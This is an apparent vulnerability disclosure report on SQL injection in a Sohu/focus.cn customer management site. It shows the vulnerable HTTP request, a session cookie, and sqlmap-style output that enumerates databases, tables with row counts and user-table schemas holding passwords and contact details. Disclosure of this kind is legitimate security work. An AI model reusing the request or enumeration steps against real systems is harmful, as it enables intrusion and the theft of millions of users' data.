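2015-12-20: Details reported to the vendor; awaiting vendor handling
2015-12-21: Vendor confirmed; details disclosed to the vendor only
2015-12-31: Details disclosed to core white hats and experts in related fields
2016-01-10: Details disclosed to regular white hats
2016-01-20: Details disclosed to intern white hats
2016-02-01: Details disclosed to the public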
As the title says.
Customer management system customer.home.focus.cn; the uac table holds 5.6 million users.
GET /proauth/tidiy/20150331/list.php?page=1&type=all&pagesize=8&team=1&ordertype=1&_=1450523184981 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Accept: */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Referer: http://home.focus.cn/zhuanti15/tidiymatch/
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Host: customer.home.focus.cn
Cookie: IPLOC=CN88; SUV=1512191837214706; homeforumsaw=607%2C1300; PHPSESSID=n9kkss0gec0vleplh7mnripuk5; _f_bbs_e=0
Accept-Encoding: gzip, deflate

available databases [3]:
[*] home_wd
[*] information_schema
[*] test

[00:29:18] [INFO] fetched data logged to text files under './output/customer.home.focus.cn'
[*] shutting down at 00:29:18

Database: home_wd
[15 tables]
+--------------+
| authtable    |
| authtorole   |
| gzt          |
| gzt_news     |
| member       |
| member2      |
| menutable    |
| project      |
| projectfield |
| raffle       |
| roletable    |
| shake        |
| uac          |
| uac2         |
| userinfo     |
+--------------+

[00:35:17] [DEBUG] performed 11 queries in 0.80 seconds
Database: home_wd
+--------------+---------+
| Table        | Entries |
+--------------+---------+
| uac          | 5522287 |
| uac2         | 466483  |
| raffle       | 307568  |
| member2      | 266379  |
| member       | 139418  |
| projectfield | 2051    |
| project      | 270     |
| authtorole   | 142     |
| authtable    | 99      |
| menutable    | 56      |
| userinfo     | 31      |
| shake        | 12      |
| roletable    | 6       |
| gzt          | 5       |
| gzt_news     | 3       |
+--------------+---------+

Database: home_wd
Table: uac
[17 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| actype   | int(4)       |
| address  | varchar(500) |
| city     | varchar(50)  |
| email    | varchar(200) |
| id       | int(4)       |
| ip       | varchar(40)  |
| nickname | varchar(20)  |
| partnum  | int(4)       |
| phone    | varchar(12)  |
| platform | varchar(20)  |
| province | varchar(20)  |
| pwd      | varchar(30)  |
| reward   | int(4)       |
| rtime    | datetime     |
| sex      | char(1)      |
| uname    | varchar(20)  |
| votenum  | int(4)       |
+----------+--------------+

Database: home_wd
Table: raffle
[17 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| actype   | int(4)       |
| address  | varchar(200) |
| city     | char(50)     |
| email    | char(28)     |
| id       | int(4)       |
| ip       | char(50)     |
| nickname | char(20)     |
| partnum  | int(4)       |
| phone    | char(12)     |
| platform | char(20)     |
| province | char(20)     |
| pwd      | char(30)     |
| reward   | int(4)       |
| rtime    | datetime     |
| sex      | char(1)      |
| uname    | char(20)     |
| votenum  | int(4)       |
+----------+--------------+

Database: home_wd
Table: projectfield
[10 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| excelw    | int(4)       |
| field     | varchar(20)  |
| fieldname | varchar(40)  |
| ID        | int(4)       |
| isshow    | smallint(4)  |
| json      | varchar(200) |
| piccatlog | varchar(50)  |
| projectid | int(4)       |
| sortno    | int(4)       |
| width     | int(4)       |
+-----------+--------------+

Database: home_wd
Table: roletable
[2 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| ID       | int(4)      |
| RoleName | varchar(30) |
+----------+-------------+

Database: home_wd
Table: member2
[17 columns]
+----------+-----------+
| Column   | Type      |
+----------+-----------+
| actype   | int(4)    |
| address  | char(140) |
| city     | char(50)  |
| email    | char(28)  |
| id       | int(4)    |
| ip       | char(50)  |
| nickname | char(20)  |
| partnum  | int(4)    |
| phone    | char(12)  |
| platform | char(20)  |
| province | char(20)  |
| pwd      | char(30)  |
| reward   | int(4)    |
| rtime    | datetime  |
| sex      | char(1)   |
| uname    | char(20)  |
| votenum  | int(4)    |
+----------+-----------+

Database: home_wd
Table: menutable
[6 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| level    | int(4)      |
| ID       | int(4)      |
| menuName | varchar(30) |
| menutype | varchar(10) |
| parent   | int(4)      |
| URL      | varchar(60) |
+----------+-------------+

Database: home_wd
Table: project
[6 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| ID        | int(4)      |
| kehuid    | int(4)      |
| proindex  | int(4)      |
| proname   | varchar(40) |
| ptype     | smallint(4) |
| tablename | varchar(10) |
+-----------+-------------+

Database: home_wd
Table: gzt_news
[17 columns]
+----------+----------+
| Column   | Type     |
+----------+----------+
| actype   | int(4)   |
| address  | text     |
| city     | char(50) |
| email    | char(28) |
| id       | int(4)   |
| ip       | char(50) |
| nickname | char(20) |
| partnum  | int(4)   |
| phone    | char(12) |
| platform | char(20) |
| province | char(20) |
| pwd      | char(30) |
| reward   | int(4)   |
| rtime    | datetime |
| sex      | char(1)  |
| uname    | char(30) |
| votenum  | int(4)   |
+----------+----------+

Database: home_wd
Table: authtorole
[2 columns]
+--------+--------+
| Column | Type   |
+--------+--------+
| AuthID | int(4) |
| RoleID | int(4) |
+--------+--------+

Database: home_wd
Table: member
[15 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| accesstoken | varchar(128) |
| address     | varchar(100) |
| city        | varchar(30)  |
| email       | varchar(30)  |
| headerimg   | varchar(200) |
| ID          | int(4)       |
| loginnum    | int(4)       |
| name        | varchar(30)  |
| nickname    | varchar(30)  |
| phone       | varchar(12)  |
| province    | varchar(30)  |
| pwd         | varchar(30)  |
| rtime       | datetime     |
| sex         | char(1)      |
| uacid       | varchar(40)  |
+-------------+--------------+

Database: home_wd
Table: userinfo
[5 columns]
+----------------+-------------+
| Column         | Type        |
+----------------+-------------+
| AccountEndTime | date        |
| ID             | int(11)     |
| Password       | varchar(20) |
| UserName       | varchar(30) |
| UserRole       | int(4)      |
+----------------+-------------+

Database: home_wd
Table: shake
[4 columns]
+---------+-------------+
| Column  | Type        |
+---------+-------------+
| gmstatu | int(4)      |
| partnum | int(4)      |
| partyid | varchar(20) |
| rtime   | datetime    |
+---------+-------------+

Database: home_wd
Table: gzt
[17 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| actype   | int(4)       |
| address  | varchar(500) |
| city     | char(50)     |
| email    | char(28)     |
| id       | int(4)       |
| ip       | char(50)     |
| nickname | char(20)     |
| partnum  | int(4)       |
| phone    | char(12)     |
| platform | char(20)     |
| province | char(20)     |
| pwd      | char(30)     |
| reward   | int(4)       |
| rtime    | datetime     |
| sex      | char(1)      |
| uname    | char(20)     |
| votenum  | int(4)       |
+----------+--------------+

Database: home_wd
Table: uac2
[17 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| actype   | int(4)       |
| address  | varchar(500) |
| city     | char(50)     |
| email    | char(28)     |
| id       | int(4)       |
| ip       | char(50)     |
| nickname | char(20)     |
| partnum  | int(4)       |
| phone    | char(12)     |
| platform | char(20)     |
| province | char(20)     |
| pwd      | char(30)     |
| reward   | int(4)       |
| rtime    | datetime     |
| sex      | char(1)      |
| uname    | char(20)     |
| votenum  | int(4)       |
+----------+--------------+

Database: home_wd
Table: uac
[17 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| actype   | int(4)       |
| address  | varchar(500) |
| city     | varchar(50)  |
| email    | varchar(200) |
| id       | int(4)       |
| ip       | varchar(40)  |
| nickname | varchar(20)  |
| partnum  | int(4)       |
| phone    | varchar(12)  |
| platform | varchar(20)  |
| province | varchar(20)  |
| pwd      | varchar(30)  |
| reward   | int(4)       |
| rtime    | datetime     |
| sex      | char(1)      |
| uname    | varchar(20)  |
| votenum  | int(4)       |
+----------+--------------+

Database: home_wd
Table: authtable
[3 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| Authority | varchar(30) |
| ID        | int(4)      |
| menuID    | int(4)      |
+-----------+-------------+
Severity: High
Vulnerability Rank: 15
Confirmed at: 2015-12-21 09:56
Thank you for your support of Sohu security!
None yet